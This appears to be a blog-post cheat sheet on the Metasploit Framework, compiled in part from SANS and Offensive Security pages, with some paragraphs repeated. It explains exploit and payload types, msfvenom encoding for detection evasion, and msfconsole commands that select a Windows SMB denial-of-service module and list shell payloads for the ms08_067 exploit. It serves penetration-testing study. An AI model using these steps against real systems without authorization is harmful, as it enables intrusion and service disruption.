Metasploit
Cheat Sheet
You already know what a vulnerability is.
An exploit is a piece of code written to take advantage of a particular vulnerability.
A payload is a piece of code to be executed through said exploit.
Have a look at the Metasploit Framework. It is simply a collection of exploits and payloads. Each exploit can be attached with various payloads like reverse or bind shells, the meterpreter shell etc.
The beauty of the Metasploit Framework is that it is modular. You can mix and match different payloads and exploits to achieve the needed results.
From <https://www.sans.org/security-resources/sec560/misc_tools_sheet_v1.pdf>
Metasploit The Metasploit Framework is a development platform for developing and using security tools and exploits. Metasploit Meterpreter
Meterpreter is a payload within the Metasploit Framework that provides control over an exploited target system, running as a DLL loaded inside of any process on a target machine.
Metasploit msfvenom is a component of the Metasploit Framework that allows users to generate a standalone version of any payload within the framework. Payloads can be generated in a variety of formats including executable, Ruby script, and raw shellcode. The msfvenom tool can also encode payloads to help avoid detection.
What Does Payload Mean?
A payload in
metapsloit refers to an exploit module. There are three different types of
payload modules in the
Metasploit Framework: Singles, Stagers, and Stages. These different types allow for a great
deal of versatility and can be useful across numerous types of scenarios.
Whether or not a payload is staged, is represented by ‘/’ in the payload name.
For example, “windows/shell_bind_tcp” is
a single payload with no stage, whereas “windows/shell/bind_tcp”
consists of a stager (bind_tcp) and a stage (shell).
Contents
You already know
what a vulnerability
is.
An exploit is a piece of code written to take advantage of a particular vulnerability. A payload is a piece of code to be executed through said exploit.
Have a look at the
Metasploit Framework. It is simply a collection of exploits and payloads. Each
exploit can be attached with various payloads like reverse or bind shells, the
meterpreter shell etc.
The beauty of the
Metasploit Framework is that it is modular. You can mix and match different
payloads and exploits to achieve the needed results.
- Metasploitable 2 Exploitability Guide
- Penetration Testing Lab-rlogin Service Exploitation..install rsh-client on kali $ apt-get install rsh-client.
- Penetration Testing Practice Lab - AmanHardika
source: https://www.offensive-security.com/metasploit-unleashed/modules-and-locations/
Exploits
In the Metasploit Framework, exploit modules are defined as modules that use payloads.
root@kali:~# ls /usr/share/metasploit-framework/modules/exploits/
aix bsdi firefox irix multi solaris
android dialup freebsd linux netware unix
apple_ios example.rb hpux mainframe osx windows
Auxiliary
Auxiliary modules include port scanners, fuzzers, sniffers, and more.
root@kali:~# ls /usr/share/metasploit-framework/modules/auxiliary/
admin client dos gather scanner spoof vsploit
analyze crawler example.rb parser server sqli
bnat docx fuzzers pdf sniffer voip
Payloads, Encoders, Nops
Payloads consist of code that runs remotely, while encoders ensure that payloads make it to their destination intact. Nops keep the payload sizes consistent across exploit attempts.
root@kali:~# ls /usr/share/metasploit-framework/modules/ singles stagers stages root@kali:~# ls /usr/share/metasploit-framework/modules/encoders/ cmd generic mipsbe mipsle php ppc ruby sparc x64 x86 root@kali:~# ls /usr/share/metasploit-framework/modules/nops/ aarch64 armle mipsbe php ppc sparc tty x64 x86
use command
When you have decided on a particular module to make use of, issue the use command to select it. The usecommand changes your context to a specific module, exposing type-specific commands. Notice in the output below that any global variables that were previously set are already configured.
msf > use dos/windows/smb/ms09_001_write
msf auxiliary(ms09_001_write) > show options
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 445 yes Set the SMB service port
msf auxiliary(ms09_001_write) >
Using MSFconsole Payloads
Running show payloads will display all of the different payloads for all platforms available within Metasploit.
msf > show payloads
Payloads
========
Name Disclosure Date Rank Description
---- --------------- ---- -----------
aix/ppc/shell_bind_tcp normal AIX Command Shell, Bind TCP Inline
aix/ppc/shell_find_port normal AIX Command Shell, Find Port Inline
aix/ppc/shell_interact normal AIX execve shell for inetd
...snip...
payloads
As you can see, there are a lot of payloads available. Fortunately, when you are in the context of a particular exploit, running show payloads will only display the payloads that are compatible with that particular exploit. For instance, if it is a Windows exploit, you will not be shown the Linux payloads.
msf exploit(ms08_067_netapi) > show payloads
Compatible Payloads
===================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
generic/custom normal Custom Payload
generic/debug_trap normal Generic x86 Debug Trap
generic/shell_bind_tcp normal Generic Command Shell, Bind TCP Inline
...snip...
- Ctrl+Z will prompt you background the session, giving you Metasploit console access again.
- Ctrl+C will drop the session altogether
- BACK command to go back
- If Metasploit didnt give you a shell directly, but instead says "Shell session [N] opened..", that means that your exploit worked and that Metasploit has a connection open with the target machine waiting for you. If you dont get your msf prompt back hit Ctrl+C to do so ONCE. Hitting twice will drop out of Metasploit
Comments
Post a Comment